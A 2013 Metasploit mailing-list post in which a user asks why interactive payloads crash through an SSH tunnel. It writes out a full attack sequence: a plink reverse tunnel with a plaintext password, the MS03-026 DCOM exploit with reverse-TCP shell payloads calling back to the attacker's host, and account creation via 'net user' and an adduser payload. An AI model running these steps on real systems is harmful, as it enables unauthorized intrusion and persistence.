Metasploit mailing list archives
Interactive payloads fail through SSH tunnel
From: "Mike Jones!" <property.of.mike.jones () gmail com>
Date: Sat, 23 Feb 2013 21:36:04 -0500
Hello, Meterpreter crashes when used through an SSH tunnel. I'm sure it is me doing something stupid so was hoping somebody could point out my mistake. I start with a meterpreter shell on an unprivileged account, then set up SSH tunnel for port 135 so I can do MS03-026 exploit against DCOM. Probably good to mention too that there is no NAT between the two systems. meterpreter > shell Process 1936 created. Channel 2 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. c:\foobar>plink -l root -pw mystupidpassword -R 135:localhost:135 192.168.12.48 My system is 192.168.12.48. Tunnel is created and target has service up and running on its port 135. Now I set up exploit in separate metasploit instance. msf > use exploit/windows/dcerpc/ms03_026_dcom msf exploit(ms03_026_dcom) > set RHOST 127.0.0.1 RHOST => 127.0.0.1 msf exploit(ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms03_026_dcom) > set LHOST 192.168.12.48 LHOST => 192.168.12.48 msf exploit(ms03_026_dcom) > show options Module options (exploit/windows/dcerpc/ms03_026_dcom): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 127.0.0.1 yes The target address RPORT 135 yes The target port Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process, none LHOST 192.168.12.48 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows NT SP3-6a/2000/XP/2003 Universal Now I run exploit and it is successful, payload lands, meterpreter shell opens. Then it crashes when I do anything. msf exploit(ms03_026_dcom) > exploit [*] Started reverse handler on 192.168.12.48:4444 [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135] ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135] ... [*] Sending exploit ... [*] Sending stage (752128 bytes) to 192.168.13.203 meterpreter > getuid [-] Session manipulation failed: Validation failed: Address is reserved ["/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/validations.rb:56:in `save!'", "/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/attribute_methods/dirty.rb:33:in `save!'", "/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:246:in `block in save!'", "/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:295:in `block in with_transaction_returning_status'", "/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/connection_adapters/abstract/database_statements.rb:192:in `transaction'", "/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:208:in `transaction'", "/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:293:in `with_transaction_returning_status'", "/opt/metasploit/msf3/lib/gemcache/ruby/1.9.1/gems/activerecord-3.2.8/lib/active_record/transactions.rb:246:in `save!'", "/opt/metasploit/msf3/lib/msf/core/db.rb:349:in `block in report_host'", "/opt/metasploit/msf3/lib/msf/core/patches/active_record.rb:22:in `with_connection'", "/opt/metasploit/msf3/lib/msf/core/db.rb:295:in `report_host'", "/opt/metasploit/msf3/lib/msf/core/db.rb:1904:in `block in report_event'", "/opt/metasploit/msf3/lib/msf/core/patches/active_record.rb:22:in `with_connection'", "/opt/metasploit/msf3/lib/msf/core/db.rb:1898:in `report_event'", "/opt/metasploit/msf3/lib/msf/core/framework.rb:222:in `report_event'", "/opt/metasploit/msf3/lib/msf/core/framework.rb:331:in `session_event'", "/opt/metasploit/msf3/lib/msf/core/framework.rb:408:in `block in on_session_output'", "/opt/metasploit/msf3/lib/msf/core/framework.rb:407:in `each'", "/opt/metasploit/msf3/lib/msf/core/framework.rb:407:in `on_session_output'", "/opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:183:in `block in method_missing'", "/opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:181:in `each'", "/opt/metasploit/msf3/lib/msf/core/event_dispatcher.rb:181:in `method_missing'", "/opt/metasploit/msf3/lib/msf/core/session_manager.rb:238:in `block in register'", "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:271:in `call'", "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:271:in `print_error'", "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:436:in `unknown_command'", "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:411:in `run_single'", "/opt/metasploit/msf3/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'", "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:190:in `call'", "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:190:in `run'", "/opt/metasploit/msf3/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'", "/opt/metasploit/msf3/lib/msf/base/sessions/meterpreter.rb:431:in `_interact'", "/opt/metasploit/msf3/lib/rex/ui/interactive.rb:49:in `interact'", "/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/core.rb:1596:in `cmd_sessions'", "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'", "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'", "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'", "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'", "/opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/exploit.rb:179:in `cmd_exploit'", "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'", "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'", "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'", "/opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'", "/opt/metasploit/msf3/lib/rex/ui/text/shell.rb:200:in `run'", "./msfconsole:148:in `<main>'"] This isn't limited to meterpreter. I tried different payload for just shell and still crashed. msf exploit(ms03_026_dcom) > set payload windows/shell_reverse_tcp payload => windows/shell_reverse_tcp msf exploit(ms03_026_dcom) > exploit [*] Started reverse handler on 192.168.12.48:9090 [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135] ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135] ... [*] Sending exploit ... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>net user test test /add [-] Session manipulation failed: Validation failed: Address is reserved ... {snipped} Though a non-interactive payload works ok. msf exploit(ms03_026_dcom) > set payload windows/adduser payload => windows/adduser msf exploit(ms03_026_dcom) > set USER testuser USER => testuser msf exploit(ms03_026_dcom) > set PASS Testpass@1 PASS => Testpass@1 msf exploit(ms03_026_dcom) > exploit [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135] ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:127.0.0.1[135] ... [*] Sending exploit ... msf exploit(ms03_026_dcom) > In that case, new user 'testuser' was added. I saw a couple threads with this same error but didn't gleam a simple solution from them. There are also lots of this error on pastebin. https://community.rapid7.com/thread/2046 https://community.rapid7.com/thread/1856 Also saw an example where the person set ExitOnSession false, tried that, still crashes. Guys help I am stupid what am I doing wrong?
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Interactive payloads fail through SSH tunnel Mike Jones! (Feb 23)
- Re: Interactive payloads fail through SSH tunnel David Kennedy (Feb 23)
- Re: Interactive payloads fail through SSH tunnel Mike Jones! (Feb 23)
- Re: Interactive payloads fail through SSH tunnel David Kennedy (Feb 23)
- Re: Interactive payloads fail through SSH tunnel Tod Beardsley (Feb 24)
- Re: Interactive payloads fail through SSH tunnel Mike Jones! (Feb 23)
- Re: Interactive payloads fail through SSH tunnel David Kennedy (Feb 23)